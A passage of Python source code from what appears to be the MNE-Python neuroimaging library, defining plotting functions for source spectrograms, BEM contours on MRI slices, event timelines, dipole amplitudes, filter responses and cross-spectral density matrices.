axes[0, k].plot(s, color='k', zorder=3)
this_rank = this_rank[key]
axes[0, k].axvline(this_rank - 1, ls='--', color='r',
alpha=0.5, zorder=4, clip_on=False)
axes[0, k].text(this_rank - 1, axes[0, k].get_ylim()[1],
'rank ≈ %d' % (this_rank,), ha='right', va='top',
color='r', alpha=0.5, zorder=4)
axes[0, k].set(ylabel=u'Noise σ (%s)' % unit, yscale='log',
xlabel='Eigenvalue index', title=name,
xlim=[0, len(s) - 1])
tight_layout(fig=fig_svd)
plt_show(show)
return fig_cov, fig_svd
def plot_source_spectrogram(stcs, freq_bins, tmin=None, tmax=None,
source_index=None, colorbar=False, show=True):
"""Plot source power in time-freqency grid.
Parameters
----------
stcs : list of SourceEstimate
Source power for consecutive time windows, one SourceEstimate object
should be provided for each frequency bin.
freq_bins : list of tuples of float
Start and end points of frequency bins of interest.
tmin : float
Minimum time instant to show.
tmax : float
Maximum time instant to show.
source_index : int | None
Index of source for which the spectrogram will be plotted. If None,
the source with the largest activation will be selected.
colorbar : bool
If true, a colorbar will be added to the plot.
show : bool
Show figure if True.
Returns
-------
fig : instance of Figure
The figure.
"""
import matplotlib.pyplot as plt
# Input checks
if len(stcs) == 0:
raise ValueError('cannot plot spectrogram if len(stcs) == 0')
stc = stcs[0]
if tmin is not None and tmin < stc.times[0]:
raise ValueError('tmin cannot be smaller than the first time point '
'provided in stcs')
if tmax is not None and tmax > stc.times[-1] + stc.tstep:
raise ValueError('tmax cannot be larger than the sum of the last time '
'point and the time step, which are provided in stcs')
# Preparing time-frequency cell boundaries for plotting
if tmin is None:
tmin = stc.times[0]
if tmax is None:
tmax = stc.times[-1] + stc.tstep
time_bounds = np.arange(tmin, tmax + stc.tstep, stc.tstep)
freq_bounds = sorted(set(np.ravel(freq_bins)))
freq_ticks = copy.deepcopy(freq_bounds)
# Reject time points that will not be plotted and gather results
source_power = []
for stc in stcs:
stc = stc.copy() # copy since crop modifies inplace
stc.crop(tmin, tmax - stc.tstep)
source_power.append(stc.data)
source_power = np.array(source_power)
# Finding the source with maximum source power
if source_index is None:
source_index = np.unravel_index(source_power.argmax(),
source_power.shape)[1]
# If there is a gap in the frequency bins record its locations so that it
# can be covered with a gray horizontal bar
gap_bounds = []
for i in range(len(freq_bins) - 1):
lower_bound = freq_bins[i][1]
upper_bound = freq_bins[i + 1][0]
if lower_bound != upper_bound:
freq_bounds.remove(lower_bound)
gap_bounds.append((lower_bound, upper_bound))
# Preparing time-frequency grid for plotting
time_grid, freq_grid = np.meshgrid(time_bounds, freq_bounds)
# Plotting the results
fig = plt.figure(figsize=(9, 6))
plt.pcolor(time_grid, freq_grid, source_power[:, source_index, :],
cmap='Reds')
ax = plt.gca()
ax.set(title='Source power', xlabel='Time (s)', ylabel='Frequency (Hz)')
time_tick_labels = [str(np.round(t, 2)) for t in time_bounds]
n_skip = 1 + len(time_bounds) // 10
for i in range(len(time_bounds)):
if i % n_skip != 0:
time_tick_labels[i] = ''
ax.set_xticks(time_bounds)
ax.set_xticklabels(time_tick_labels)
plt.xlim(time_bounds[0], time_bounds[-1])
plt.yscale('log')
ax.set_yticks(freq_ticks)
ax.set_yticklabels([np.round(freq, 2) for freq in freq_ticks])
plt.ylim(freq_bounds[0], freq_bounds[-1])
plt.grid(True, ls='-')
if colorbar:
plt.colorbar()
tight_layout(fig=fig)
# Covering frequency gaps with horizontal bars
for lower_bound, upper_bound in gap_bounds:
plt.barh(lower_bound, time_bounds[-1] - time_bounds[0], upper_bound -
lower_bound, time_bounds[0], color='#666666')
plt_show(show)
return fig
def _plot_mri_contours(mri_fname, surfaces, src, orientation='coronal',
slices=None, show=True, show_indices=False,
show_orientation=False, img_output=False):
"""Plot BEM contours on anatomical slices."""
import matplotlib.pyplot as plt
from matplotlib import patheffects
# For ease of plotting, we will do everything in voxel coordinates.
_check_option('orientation', orientation, ('coronal', 'axial', 'sagittal'))
# Load the T1 data
_, vox_mri_t, _, _, _, nim = _read_mri_info(
mri_fname, units='mm', return_img=True)
mri_vox_t = invert_transform(vox_mri_t)['trans']
del vox_mri_t
# plot axes (x, y, z) as data axes
(x, y, z), (flip_x, flip_y, flip_z), order = _mri_orientation(
nim, orientation)
transpose = x < y
data = _get_img_fdata(nim)
shift_x = data.shape[x] if flip_x < 0 else 0
shift_y = data.shape[y] if flip_y < 0 else 0
n_slices = data.shape[z]
if slices is None:
slices = np.round(np.linspace(0, n_slices - 1, 14)).astype(int)[1:-1]
slices = np.atleast_1d(slices).copy()
slices[slices < 0] += n_slices # allow negative indexing
if not np.array_equal(np.sort(slices), slices) or slices.ndim != 1 or \
slices.size < 1 or slices[0] < 0 or slices[-1] >= n_slices or \
slices.dtype.kind not in 'iu':
raise ValueError('slices must be a sorted 1D array of int with unique '
'elements, at least one element, and no elements '
'greater than %d, got %s' % (n_slices - 1, slices))
if flip_z < 0:
# Proceed in the opposite order to maintain left-to-right / orientation
slices = slices[::-1]
# create of list of surfaces
surfs = list()
for file_name, color in surfaces:
surf = dict()
surf['rr'], surf['tris'] = read_surface(file_name)
# move surface to voxel coordinate system
surf['rr'] = apply_trans(mri_vox_t, surf['rr'])
surfs.append((surf, color))
sources = list()
if src is not None:
_ensure_src(src, extra=' or None')
# Eventually we can relax this by allowing ``trans`` if need be
if src[0]['coord_frame'] != FIFF.FIFFV_COORD_MRI:
raise ValueError(
'Source space must be in MRI coordinates, got '
f'{_frame_to_str[src[0]["coord_frame"]]}')
for src_ in src:
points = src_['rr'][src_['inuse'].astype(bool)]
sources.append(apply_trans(mri_vox_t, points * 1e3))
sources = np.concatenate(sources, axis=0)
if img_output:
n_col = n_axes = 1
fig, ax = plt.subplots(1, 1, figsize=(7.0, 7.0))
axs = [ax] * len(slices)
w = fig.get_size_inches()[0]
fig.set_size_inches([w, w / data.shape[x] * data.shape[y]])
plt.close(fig)
else:
n_col = 4
fig, axs, _, _ = _prepare_trellis(len(slices), n_col)
n_axes = len(axs)
fig.set_facecolor('k')
bounds = np.concatenate(
[[-np.inf], slices[:-1] + np.diff(slices) / 2., [np.inf]]) # float
slicer = [slice(None)] * 3
ori_labels = dict(R='LR', A='PA', S='IS')
xlabels, ylabels = ori_labels[order[0]], ori_labels[order[1]]
path_effects = [patheffects.withStroke(linewidth=4, foreground="k",
alpha=0.75)]
out = list() if img_output else fig
for ai, (ax, sl, lower, upper) in enumerate(zip(
axs, slices, bounds[:-1], bounds[1:])):
# adjust the orientations for good view
slicer[z] = sl
dat = data[tuple(slicer)]
dat = dat.T if transpose else dat
dat = dat[::flip_y, ::flip_x]
# First plot the anatomical data
if img_output:
ax.clear()
ax.imshow(dat, cmap=plt.cm.gray, origin='lower')
ax.set_autoscale_on(False)
ax.axis('off')
ax.set_aspect('equal') # XXX eventually could deal with zooms
# and then plot the contours on top
for surf, color in surfs:
with warnings.catch_warnings(record=True): # ignore contour warn
warnings.simplefilter('ignore')
ax.tricontour(flip_x * surf['rr'][:, x] + shift_x,
flip_y * surf['rr'][:, y] + shift_y,
surf['tris'], surf['rr'][:, z],
levels=[sl], colors=color, linewidths=1.0,
zorder=1)
if len(sources):
in_slice = (sources[:, z] >= lower) & (sources[:, z] < upper)
ax.scatter(flip_x * sources[in_slice, x] + shift_x,
flip_y * sources[in_slice, y] + shift_y,
marker='.', color='#FF00FF', s=1, zorder=2)
if show_indices:
ax.text(dat.shape[1] // 8 + 0.5, 0.5, str(sl),
color='w', fontsize='x-small', va='bottom', ha='left')
# label the axes
kwargs = dict(
color='#66CCEE', fontsize='medium', path_effects=path_effects,
family='monospace', clip_on=False, zorder=5, weight='bold')
if show_orientation:
if ai % n_col == 0: # left
ax.text(0, dat.shape[0] / 2., xlabels[0],
va='center', ha='left', **kwargs)
if ai % n_col == n_col - 1 or ai == n_axes - 1: # right
ax.text(dat.shape[1] - 1, dat.shape[0] / 2., xlabels[1],
va='center', ha='right', **kwargs)
if ai >= n_axes - n_col: # bottom
ax.text(dat.shape[1] / 2., 0, ylabels[0],
ha='center', va='bottom', **kwargs)
if ai < n_col or n_col == 1: # top
ax.text(dat.shape[1] / 2., dat.shape[0] - 1, ylabels[1],
ha='center', va='top', **kwargs)
if img_output:
output = BytesIO()
fig.savefig(output, bbox_inches='tight',
pad_inches=0, format='png')
out.append(base64.b64encode(output.getvalue()).decode('ascii'))
fig.subplots_adjust(left=0., bottom=0., right=1., top=1., wspace=0.,
hspace=0.)
plt_show(show, fig=fig)
return out
def plot_bem(subject=None, subjects_dir=None, orientation='coronal',
slices=None, brain_surfaces=None, src=None, show=True,
show_indices=True, mri='T1.mgz', show_orientation=True):
"""Plot BEM contours on anatomical slices.
Parameters
----------
subject : str
Subject name.
subjects_dir : str | None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
orientation : str
'coronal' or 'axial' or 'sagittal'.
slices : list of int
Slice indices.
brain_surfaces : None | str | list of str
One or more brain surface to plot (optional). Entries should correspond
to files in the subject's ``surf`` directory (e.g. ``"white"``).
src : None | SourceSpaces | str
SourceSpaces instance or path to a source space to plot individual
sources as scatter-plot. Sources will be shown on exactly one slice
(whichever slice is closest to each source in the given orientation
plane). Path can be absolute or relative to the subject's ``bem``
folder.
.. versionchanged:: 0.20
All sources are shown on the nearest slice rather than some
being omitted.
show : bool
Show figure if True.
show_indices : bool
Show slice indices if True.
.. versionadded:: 0.20
mri : str
The name of the MRI to use. Can be a standard FreeSurfer MRI such as
``'T1.mgz'``, or a full path to a custom MRI file.
.. versionadded:: 0.21
show_orientation : str
Show the orientation (L/R, P/A, I/S) of the data slices.
.. versionadded:: 0.21
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
mne.viz.plot_alignment
Notes
-----
Images are plotted in MRI voxel coordinates.
If ``src`` is not None, for a given slice index, all source points are
shown that are halfway between the previous slice and the given slice,
and halfway between the given slice and the next slice.
For large slice decimations, this can
make some source points appear outside the BEM contour, which is shown
for the given slice index. For example, in the case where the single
midpoint slice is used ``slices=[128]``, all source points will be shown
on top of the midpoint MRI slice with the BEM boundary drawn for that
slice.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
mri_fname = _check_mri(mri, subject, subjects_dir)
# Get the BEM surface filenames
bem_path = op.join(subjects_dir, subject, 'bem')
if not op.isdir(bem_path):
raise IOError('Subject bem directory "%s" does not exist' % bem_path)
surfaces = _get_bem_plotting_surfaces(bem_path)
if brain_surfaces is not None:
if isinstance(brain_surfaces, str):
brain_surfaces = (brain_surfaces,)
for surf_name in brain_surfaces:
for hemi in ('lh', 'rh'):
surf_fname = op.join(subjects_dir, subject, 'surf',
hemi + '.' + surf_name)
if op.exists(surf_fname):
surfaces.append((surf_fname, '#00DD00'))
else:
raise IOError("Surface %s does not exist." % surf_fname)
if isinstance(src, str):
if not op.exists(src):
src_ = op.join(subjects_dir, subject, 'bem', src)
if op.exists(src_):
src = src_
else:
raise IOError("%s does not exist" % src)
src = read_source_spaces(src)
elif src is not None and not isinstance(src, SourceSpaces):
raise TypeError("src needs to be None, str or SourceSpaces instance, "
"not %s" % repr(src))
if len(surfaces) == 0:
raise IOError('No surface files found. Surface files must end with '
'inner_skull.surf, outer_skull.surf or outer_skin.surf')
# Plot the contours
return _plot_mri_contours(mri_fname, surfaces, src, orientation, slices,
show, show_indices, show_orientation)
def _get_bem_plotting_surfaces(bem_path):
surfaces = []
for surf_name, color in (('*inner_skull', '#FF0000'),
('*outer_skull', '#FFFF00'),
('*outer_skin', '#FFAA80')):
surf_fname = glob(op.join(bem_path, surf_name + '.surf'))
if len(surf_fname) > 0:
surf_fname = surf_fname[0]
logger.info("Using surface: %s" % surf_fname)
surfaces.append((surf_fname, color))
return surfaces
@verbose
def plot_events(events, sfreq=None, first_samp=0, color=None, event_id=None,
axes=None, equal_spacing=True, show=True, on_missing='raise',
verbose=None):
"""Plot events to get a visual display of the paradigm.
Parameters
----------
events : array, shape (n_events, 3)
The events.
sfreq : float | None
The sample frequency. If None, data will be displayed in samples (not
seconds).
first_samp : int
The index of the first sample. Recordings made on Neuromag systems
number samples relative to the system start (not relative to the
beginning of the recording). In such cases the ``raw.first_samp``
attribute can be passed here. Default is 0.
color : dict | None
Dictionary of event_id integers as keys and colors as values. If None,
colors are automatically drawn from a default list (cycled through if
number of events longer than list of default colors). Color can be any
valid :doc:`matplotlib color <tutorials/colors/colors>`.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and their associated
event_id values. Labels are used to plot a legend. If None, no legend
is drawn.
axes : instance of Axes
The subplot handle.
equal_spacing : bool
Use equal spacing between events in y-axis.
show : bool
Show figure if True.
%(on_missing_events)s
%(verbose)s
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
"""
if sfreq is None:
sfreq = 1.0
xlabel = 'Samples'
else:
xlabel = 'Time (s)'
events = np.asarray(events)
if len(events) == 0:
raise ValueError('No events in events array, cannot plot.')
unique_events = np.unique(events[:, 2])
if event_id is not None:
# get labels and unique event ids from event_id dict,
# sorted by value
event_id_rev = {v: k for k, v in event_id.items()}
conditions, unique_events_id = zip(*sorted(event_id.items(),
key=lambda x: x[1]))
keep = np.ones(len(unique_events_id), bool)
for ii, this_event in enumerate(unique_events_id):
if this_event not in unique_events:
msg = f'{this_event} from event_id is not present in events.'
_on_missing(on_missing, msg)
keep[ii] = False
conditions = [cond for cond, k in zip(conditions, keep) if k]
unique_events_id = [id_ for id_, k in zip(unique_events_id, keep) if k]
if len(unique_events_id) == 0:
raise RuntimeError('No usable event IDs found')
for this_event in unique_events:
if this_event not in unique_events_id:
warn('event %s missing from event_id will be ignored'
% this_event)
else:
unique_events_id = unique_events
color = _handle_event_colors(color, unique_events, event_id)
import matplotlib.pyplot as plt
fig = None
if axes is None:
fig = plt.figure()
ax = axes if axes else plt.gca()
unique_events_id = np.array(unique_events_id)
min_event = np.min(unique_events_id)
max_event = np.max(unique_events_id)
max_x = (events[np.in1d(events[:, 2], unique_events_id), 0].max() -
first_samp) / sfreq
handles, labels = list(), list()
for idx, ev in enumerate(unique_events_id):
ev_mask = events[:, 2] == ev
count = ev_mask.sum()
if count == 0:
continue
y = np.full(count, idx + 1 if equal_spacing else events[ev_mask, 2][0])
if event_id is not None:
event_label = '%s (%s)' % (event_id_rev[ev], count)
else:
event_label = 'N=%d' % (count,)
labels.append(event_label)
kwargs = {}
if ev in color:
kwargs['color'] = color[ev]
handles.append(
ax.plot((events[ev_mask, 0] - first_samp) / sfreq,
y, '.', clip_on=False, **kwargs)[0])
if equal_spacing:
ax.set_ylim(0, unique_events_id.size + 1)
ax.set_yticks(1 + np.arange(unique_events_id.size))
ax.set_yticklabels(unique_events_id)
else:
ax.set_ylim([min_event - 1, max_event + 1])
ax.set(xlabel=xlabel, ylabel='Events id', xlim=[0, max_x])
ax.grid(True)
fig = fig if fig is not None else plt.gcf()
# reverse order so that the highest numbers are at the top
# (match plot order)
handles, labels = handles[::-1], labels[::-1]
box = ax.get_position()
factor = 0.8 if event_id is not None else 0.9
ax.set_position([box.x0, box.y0, box.width * factor, box.height])
ax.legend(handles, labels, loc='center left', bbox_to_anchor=(1, 0.5),
fontsize='small')
fig.canvas.draw()
plt_show(show)
return fig
def _get_presser(fig):
"""Get our press callback."""
import matplotlib
callbacks = fig.canvas.callbacks.callbacks['button_press_event']
func = None
for key, val in callbacks.items():
if LooseVersion(matplotlib.__version__) >= '3':
func = val()
else:
func = val.func
if func.__class__.__name__ == 'partial':
break
else:
func = None
assert func is not None
return func
def plot_dipole_amplitudes(dipoles, colors=None, show=True):
"""Plot the amplitude traces of a set of dipoles.
Parameters
----------
dipoles : list of instance of Dipole
The dipoles whose amplitudes should be shown.
colors : list of color | None
Color to plot with each dipole. If None default colors are used.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
"""
import matplotlib.pyplot as plt
if colors is None:
colors = cycle(_get_color_list())
fig, ax = plt.subplots(1, 1)
xlim = [np.inf, -np.inf]
for dip, color in zip(dipoles, colors):
ax.plot(dip.times, dip.amplitude * 1e9, color=color, linewidth=1.5)
xlim[0] = min(xlim[0], dip.times[0])
xlim[1] = max(xlim[1], dip.times[-1])
ax.set(xlim=xlim, xlabel='Time (s)', ylabel='Amplitude (nAm)')
if show:
fig.show(warn=False)
return fig
def adjust_axes(axes, remove_spines=('top', 'right'), grid=True):
"""Adjust some properties of axes.
Parameters
----------
axes : list
List of axes to process.
remove_spines : list of str
Which axis spines to remove.
grid : bool
Turn grid on (True) or off (False).
"""
axes = [axes] if not isinstance(axes, (list, tuple, np.ndarray)) else axes
for ax in axes:
if grid:
ax.grid(zorder=0)
for key in remove_spines:
ax.spines[key].set_visible(False)
def _filter_ticks(lims, fscale):
"""Create approximately spaced ticks between lims."""
if fscale == 'linear':
return None, None # let matplotlib handle it
lims = np.array(lims)
ticks = list()
if lims[1] > 20 * lims[0]:
base = np.array([1, 2, 4])
else:
base = np.arange(1, 11)
for exp in range(int(np.floor(np.log10(lims[0]))),
int(np.floor(np.log10(lims[1]))) + 1):
ticks += (base * (10 ** exp)).tolist()
ticks = np.array(ticks)
ticks = ticks[(ticks >= lims[0]) & (ticks <= lims[1])]
ticklabels = [('%g' if t < 1 else '%d') % t for t in ticks]
return ticks, ticklabels
def _get_flim(flim, fscale, freq, sfreq=None):
"""Get reasonable frequency limits."""
if flim is None:
if freq is None:
flim = [0.1 if fscale == 'log' else 0., sfreq / 2.]
else:
if fscale == 'linear':
flim = [freq[0]]
else:
flim = [freq[0] if freq[0] > 0 else 0.1 * freq[1]]
flim += [freq[-1]]
if fscale == 'log':
if flim[0] <= 0:
raise ValueError('flim[0] must be positive, got %s' % flim[0])
elif flim[0] < 0:
raise ValueError('flim[0] must be non-negative, got %s' % flim[0])
return flim
def _check_fscale(fscale):
"""Check for valid fscale."""
if not isinstance(fscale, str) or fscale not in ('log', 'linear'):
raise ValueError('fscale must be "log" or "linear", got %s'
% (fscale,))
_DEFAULT_ALIM = (-80, 10)
def plot_filter(h, sfreq, freq=None, gain=None, title=None, color='#1f77b4',
flim=None, fscale='log', alim=_DEFAULT_ALIM, show=True,
compensate=False, plot=('time', 'magnitude', 'delay'),
axes=None):
"""Plot properties of a filter.
Parameters
----------
h : dict or ndarray
An IIR dict or 1D ndarray of coefficients (for FIR filter).
sfreq : float
Sample rate of the data (Hz).
freq : array-like or None
The ideal response frequencies to plot (must be in ascending order).
If None (default), do not plot the ideal response.
gain : array-like or None
The ideal response gains to plot.
If None (default), do not plot the ideal response.
title : str | None
The title to use. If None (default), determine the title based
on the type of the system.
color : color object
The color to use (default '#1f77b4').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None, freq will be used. If None (default) and freq is None,
``(0.1, sfreq / 2.)`` will be used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
The y-axis amplitude limits (dB) to use (default: (-60, 10)).
show : bool
Show figure if True (default).
compensate : bool
If True, compensate for the filter delay (phase will not be shown).
- For linear-phase FIR filters, this visualizes the filter coefficients
assuming that the output will be shifted by ``N // 2``.
- For IIR filters, this changes the filter coefficient display
by filtering backward and forward, and the frequency response
by squaring it.
.. versionadded:: 0.18
plot : list | tuple | str
A list of the requested plots from ``time``, ``magnitude`` and
``delay``. Default is to plot all three filter properties
('time', 'magnitude', 'delay').
.. versionadded:: 0.21.0
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of requested plot types. If instance of
Axes, there must be only one filter property plotted.
Defaults to ``None``.
.. versionadded:: 0.21.0
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the plots.
See Also
--------
mne.filter.create_filter
plot_ideal_filter
Notes
-----
.. versionadded:: 0.14
"""
from scipy.signal import (
freqz, group_delay, lfilter, filtfilt, sosfilt, sosfiltfilt)
import matplotlib.pyplot as plt
sfreq = float(sfreq)
_check_option('fscale', fscale, ['log', 'linear'])
if isinstance(plot, str):
plot = [plot]
for xi, x in enumerate(plot):
_check_option('plot[%d]' % xi, x, ('magnitude', 'delay', 'time'))
flim = _get_flim(flim, fscale, freq, sfreq)
if fscale == 'log':
omega = np.logspace(np.log10(flim[0]), np.log10(flim[1]), 1000)
else:
omega = np.linspace(flim[0], flim[1], 1000)
xticks, xticklabels = _filter_ticks(flim, fscale)
omega /= sfreq / (2 * np.pi)
if isinstance(h, dict): # IIR h.ndim == 2: # second-order sections
if 'sos' in h:
H = np.ones(len(omega), np.complex128)
gd = np.zeros(len(omega))
for section in h['sos']:
this_H = freqz(section[:3], section[3:], omega)[1]
H *= this_H
if compensate:
H *= this_H.conj() # time reversal is freq conj
else:
# Assume the forward-backward delay zeros out, which it
# mostly should
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd += group_delay((section[:3], section[3:]), omega)[1]
n = estimate_ringing_samples(h['sos'])
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = sosfiltfilt
gd += (len(delta) - 1) // 2
else:
func = sosfilt
h = func(h['sos'], delta)
else:
H = freqz(h['b'], h['a'], omega)[1]
if compensate:
H *= H.conj()
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h['b'], h['a']), omega)[1]
if compensate:
gd += group_delay(h['b'].conj(), h['a'].conj(), omega)[1]
n = estimate_ringing_samples((h['b'], h['a']))
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = filtfilt
else:
func = lfilter
h = func(h['b'], h['a'], delta)
if title is None:
title = 'SOS (IIR) filter'
if compensate:
title += ' (forward-backward)'
else:
H = freqz(h, worN=omega)[1]
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h, [1.]), omega)[1]
title = 'FIR filter' if title is None else title
if compensate:
title += ' (delay-compensated)'
fig = None
if axes is None:
fig, axes = plt.subplots(len(plot), 1)
if isinstance(axes, plt.Axes):
axes = [axes]
elif isinstance(axes, np.ndarray):
axes = list(axes)
if fig is None:
fig = axes[0].get_figure()
if len(axes) != len(plot):
raise ValueError('Length of axes (%d) must be the same as number of '
'requested filter properties (%d)'
% (len(axes), len(plot)))
t = np.arange(len(h))
dlim = np.abs(t).max() / 2.
dlim = [-dlim, dlim]
if compensate:
n_shift = (len(h) - 1) // 2
t -= n_shift
assert t[0] == -t[-1]
gd -= n_shift
t = t / sfreq
gd = gd / sfreq
f = omega * sfreq / (2 * np.pi)
sl = slice(0 if fscale == 'linear' else 1, None, None)
mag = 10 * np.log10(np.maximum((H * H.conj()).real, 1e-20))
if 'time' in plot:
ax_time_idx = np.where([p == 'time' for p in plot])[0][0]
axes[ax_time_idx].plot(t, h, color=color)
axes[ax_time_idx].set(xlim=t[[0, -1]], xlabel='Time (s)',
ylabel='Amplitude', title=title)
# Magnitude
if 'magnitude' in plot:
ax_mag_idx = np.where([p == 'magnitude' for p in plot])[0][0]
axes[ax_mag_idx].plot(f[sl], mag[sl], color=color,
linewidth=2, zorder=4)
if freq is not None and gain is not None:
plot_ideal_filter(freq, gain, axes[ax_mag_idx],
fscale=fscale, show=False)
axes[ax_mag_idx].set(ylabel='Magnitude (dB)', xlabel='', xscale=fscale)
if xticks is not None:
axes[ax_mag_idx].set(xticks=xticks)
axes[ax_mag_idx].set(xticklabels=xticklabels)
axes[ax_mag_idx].set(xlim=flim, ylim=alim, xlabel='Frequency (Hz)',
ylabel='Amplitude (dB)')
# Delay
if 'delay' in plot:
ax_delay_idx = np.where([p == 'delay' for p in plot])[0][0]
axes[ax_delay_idx].plot(f[sl], gd[sl], color=color,
linewidth=2, zorder=4)
# shade nulled regions
for start, stop in zip(*_mask_to_onsets_offsets(mag <= -39.9)):
axes[ax_delay_idx].axvspan(f[start], f[stop - 1],
facecolor='k', alpha=0.05,
zorder=5)
axes[ax_delay_idx].set(xlim=flim, ylabel='Group delay (s)',
xlabel='Frequency (Hz)',
xscale=fscale)
if xticks is not None:
axes[ax_delay_idx].set(xticks=xticks)
axes[ax_delay_idx].set(xticklabels=xticklabels)
axes[ax_delay_idx].set(xlim=flim, ylim=dlim, xlabel='Frequency (Hz)',
ylabel='Delay (s)')
adjust_axes(axes)
tight_layout()
plt_show(show)
return fig
def plot_ideal_filter(freq, gain, axes=None, title='', flim=None, fscale='log',
alim=_DEFAULT_ALIM, color='r', alpha=0.5, linestyle='--',
show=True):
"""Plot an ideal filter response.
Parameters
----------
freq : array-like
The ideal response frequencies to plot (must be in ascending order).
gain : array-like or None
The ideal response gains to plot.
axes : instance of Axes | None
The subplot handle. With None (default), axes are created.
title : str
The title to use, (default: '').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None (default), freq used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
If not None (default), the y-axis limits (dB) to use.
color : color object
The color to use (default: 'r').
alpha : float
The alpha to use (default: 0.5).
linestyle : str
The line style to use (default: '--').
show : bool
Show figure if True (default).
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
plot_filter
Notes
-----
.. versionadded:: 0.14
Examples
--------
Plot a simple ideal band-pass filter::
>>> from mne.viz import plot_ideal_filter
>>> freq = [0, 1, 40, 50]
>>> gain = [0, 1, 1, 0]
>>> plot_ideal_filter(freq, gain, flim=(0.1, 100)) #doctest: +ELLIPSIS
<...Figure...>
"""
import matplotlib.pyplot as plt
my_freq, my_gain = list(), list()
if freq[0] != 0:
raise ValueError('freq should start with DC (zero) and end with '
'Nyquist, but got %s for DC' % (freq[0],))
freq = np.array(freq)
# deal with semilogx problems @ x=0
_check_option('fscale', fscale, ['log', 'linear'])
if fscale == 'log':
freq[0] = 0.1 * freq[1] if flim is None else min(flim[0], freq[1])
flim = _get_flim(flim, fscale, freq)
transitions = list()
for ii in range(len(freq)):
if ii < len(freq) - 1 and gain[ii] != gain[ii + 1]:
transitions += [[freq[ii], freq[ii + 1]]]
my_freq += np.linspace(freq[ii], freq[ii + 1], 20,
endpoint=False).tolist()
my_gain += np.linspace(gain[ii], gain[ii + 1], 20,
endpoint=False).tolist()
else:
my_freq.append(freq[ii])
my_gain.append(gain[ii])
my_gain = 10 * np.log10(np.maximum(my_gain, 10 ** (alim[0] / 10.)))
if axes is None:
axes = plt.subplots(1)[1]
for transition in transitions:
axes.axvspan(*transition, color=color, alpha=0.1)
axes.plot(my_freq, my_gain, color=color, linestyle=linestyle, alpha=0.5,
linewidth=4, zorder=3)
xticks, xticklabels = _filter_ticks(flim, fscale)
axes.set(ylim=alim, xlabel='Frequency (Hz)', ylabel='Amplitude (dB)',
xscale=fscale)
if xticks is not None:
axes.set(xticks=xticks)
axes.set(xticklabels=xticklabels)
axes.set(xlim=flim)
if title:
axes.set(title=title)
adjust_axes(axes)
tight_layout()
plt_show(show)
return axes.figure
def _handle_event_colors(color_dict, unique_events, event_id):
"""Create event-integer-to-color mapping, assigning defaults as needed."""
default_colors = dict(zip(sorted(unique_events), cycle(_get_color_list())))
# warn if not enough colors
if color_dict is None:
if len(unique_events) > len(_get_color_list()):
warn('More events than default colors available. You should pass '
'a list of unique colors.')
else:
custom_colors = dict()
for key, color in color_dict.items():
if key in unique_events: # key was a valid event integer
custom_colors[key] = color
elif key in event_id: # key was an event label
custom_colors[event_id[key]] = color
else: # key not a valid event, warn and ignore
warn('Event ID %s is in the color dict but is not '
'present in events or event_id.' % str(key))
# warn if color_dict is missing any entries
unassigned = sorted(set(unique_events) - set(custom_colors))
if len(unassigned):
unassigned_str = ', '.join(str(e) for e in unassigned)
warn('Color was not assigned for event%s %s. Default colors will '
'be used.' % (_pl(unassigned), unassigned_str))
default_colors.update(custom_colors)
return default_colors
def plot_csd(csd, info=None, mode='csd', colorbar=True, cmap=None,
n_cols=None, show=True):
"""Plot CSD matrices.
A sub-plot is created for each frequency. If an info object is passed to
the function, different channel types are plotted in different figures.
Parameters
----------
csd : instance of CrossSpectralDensity
The CSD matrix to plot.
info : instance of Info | None
To split the figure by channel-type, provide the measurement info.
By default, the CSD matrix is plotted as a whole.
mode : 'csd' | 'coh'
Whether to plot the cross-spectral density ('csd', the default), or
the coherence ('coh') between the channels.
colorbar : bool
Whether to show a colorbar. Defaults to ``True``.
cmap : str | None
The matplotlib colormap to use. Defaults to None, which means the
colormap will default to matplotlib's default.
n_cols : int | None
CSD matrices are plotted in a grid. This parameter controls how
many matrix to plot side by side before starting a new row. By
default, a number will be chosen to make the grid as square as
possible.
show : bool
Whether to show the figure. Defaults to ``True``.
Returns
-------
fig : list of Figure
The figures created by this function.
"""
import matplotlib.pyplot as plt
if mode not in ['csd', 'coh']:
raise ValueError('"mode" should be either "csd" or "coh".')
if info is not None:
info_ch_names = info['ch_names']
sel_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=[])
sel_mag = pick_types(info, meg='mag', eeg=False, ref_meg=False,
exclude=[])
sel_grad = pick_types(info, meg='grad', eeg=False, ref_meg=False,
exclude=[])
idx_eeg = [csd.ch_names.index(info_ch_names[c])
for c in sel_eeg if info_ch_names[c] in csd.ch_names]
idx_mag = [csd.ch_names.index(info_ch_names[c])
for c in sel_mag if info_ch_names[c] in csd.ch_names]
idx_grad = [csd.ch_names.index(info_ch_names[c])
for c in sel_grad if info_ch_names[c] in csd.ch_names]
indices = [idx_eeg, idx_mag, idx_grad]
titles = ['EEG', 'Magnetometers', 'Gradiometers']
if mode == 'csd':
# The units in which to plot the CSD
units = dict(eeg='µV²', grad='fT²/cm²', mag='fT²')
scalings = dict(eeg=1e12, grad=1e26, mag=1e30)
else:
indices = [np.arange(len(csd.ch_names))]
